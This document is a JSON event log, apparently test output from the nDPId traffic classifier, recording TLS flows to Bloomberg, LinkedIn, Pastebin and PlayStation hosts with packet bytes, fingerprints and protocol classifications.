+01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1646482845241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482845241,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZORAAEAG0sDAqAGAbIvSZt62AbvYtDuwHTpf\/YAYAfbCEAAAAQEICrfPsOMefQzKFgMBAgABAAH8AwNDaq9+o2\/m1P9XaJsuL18rMu\/cbIc9LrPA5zUbsuvbziCdB7Y010YsAP9WvlmHthVAcmE9qTBtm04O9SpF9+K9iwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAhAB8AABxzb3VyY2Vwb2ludGNtcC5ibG9vbWJlcmcuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIFWzj0ex9WIWXeCl2qveVdo+cRB1gHroBn+mOFydyRUDABcAQQTZ7Kd3Dh15jhsRvRpWp2w5A6ZrOrpRgthYeTOHm9lBNbC7SyMy7sz4nAvG5eX8+75Yb0V9pFtY29+UzxdUbzEpACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAHoAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482860064,"flow_last_seen":1646482860064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482860064,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1646482860064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482860064,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8zthAAEAGckLAqAGADWsqDr4OAbv2xGogAAAAAKAC+vA6VgAAAgQFtAQCCArF2TKPAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1646482860089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482860089,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0KdNAAHUG4k8NayoOwKgBgAG7vg7o0cSg9sRqIYAS\/\/+nUAAAAgQFoAEDAwgBAQQC"} 
+01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1646482860092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482860092,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItztpAAEAGcE\/AqAGADWsqDr4OAbv2xGoh6NHEoVAYAfY2twAAFgMBAgABAAH8AwN91wMalwKbnp34VhS8QvEFPozBOcSHhaFoSNBfPba3AiDXrrHLYmT\/nToyiJxYmouQzlobVBifJMUtdUWk4ZdOUAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABB3d3cubGlua2VkaW4uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOvcUoPBHSJ9xxKLt05ZOdwqxB4X188WUTuTKbETRNVIABcAQQSw33BhIovc8GgXm9sGLVvnRexF7f826PClnfuvUvruR3Sq4irZ9toHOp2agzdKIN0AwGPF8iqx1fv+O3\/0IjBNACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482866432,"flow_last_seen":1646482866432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482866432,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1646482866432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482866432,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sBtAAEAG\/aLAqAGAaBdivpv+AbuQtJSoAAAAAKAC+vAG0QAAAgQFtAQCCAoY1d1UAAAAAAEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1646482866449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482866449,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGtMZoF2K+wKgBgAG7m\/4hqZihkLSUqYAS\/\/9k2gAAAgQFeAEBBAIBAwMK"} 
+01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1646482866451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482866451,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItsB1AAEAG+6\/AqAGAaBdivpv+AbuQtJSpIamYolAYAfYUJQAAFgMBAgABAAH8AwOkCw2THMGhALk0\/S0UPYY9Fiy1MMas0dLFjf2ObmEV3iD+CRapxYYnJ+AUET5SjxVSaJRJeT\/rvI5T4N1r2TpPLQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxwYXN0ZWJpbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg+1dFx2JbQxGMLbjHxdWGfdupB63kQdiHTmuNhsrVgTQAFwBBBKdDPqMFSChZhRpkv1Y2JjoX2aNL5O59XM1C0oY6ZFf1Ifckam\/eVu5cuFoipFrAsWBrxGiWt6uHvmWbTHpfZoYAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879566,"flow_last_seen":1646482879566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879566,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1646482879566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879566,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZJ5AAEAGuDfAqAGAFwFEvd\/4Abu+RY+DAAAAAKAC+vCgEQAAAgQFtAQCCAqibL0tAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1646482879585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879585,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGI9YXAUS9wKgBgAG73\/iES9VYvkWPhKAS\/ojG\/QAAAgQFtAQCCApEcjdUomy9LQEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1646482879590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879590,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZKBAAEAGtjjAqAGAFwFEvd\/4Abu+RY+EhEvVWYAYAfb4UwAAAQEICqJsvUREcjdUFgMBAgABAAH8AwPTmj1yotJrCU5Axy8WSqX4RbWM\/SINHTcC+qIJwwqdWyAtxwR2GOpVXqzss+L4QuffJNllYoSRruXn4YOMT1n2UQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAYABYAABN3d3cucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIO+m+y4kE\/Ul0wRfLnWkNqXDSHnFmA3tI1g\/5Tv\/EZwCABcAQQQh+3EFl7VEJWAHnTsK42aVbCexqYTb9DwqjdAN6Pu9IMJwjvRFdXg\/Y6aZYu3btbo89OdSMmSsifn4YkrISGSJACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879964,"flow_last_seen":1646482879964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879964,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1646482879964,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879964,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nmNAAEAGzLvAqAGAFzP2QbS4AbvcfW4jAAAAAKAC+vARXQAAAgQFtAQCCAo1KzXVAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1646482879981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879981,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGcx8XM\/ZBwKgBgAG7tLg0LEpK3H1uJKAS\/oiOFAAAAgQFtAQCCAqG0XpXNSs11QEDAwc="} 
+01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1646482879983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nmVAAEAGyrzAqAGAFzP2QbS4AbvcfW4kNCxKS4AYAfZhPwAAAQEICjUrNeiG0XpXFgMBAgABAAH8AwOVj3yfLLIdpS7ph9cCyv5vCYAGlSzvdrVr1N5tbcI94SDvfvqZxXeUOWdQ166wenjn8HB2CzcmnFG8kG7bSApHKAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAbABkAABZzdGF0aWMucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AID7op1onM6THMaho0vMOrhWIG6UTS6n8xwsrP6D1biscABcAQQR0Q9Knvll2eKORbkRyexBvYc7r+Q69FpqwjjnvO3KMU7d3ZPOw9jaGO1B0c9lo8UIHFSOSayE0o5gPreutfPv3ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 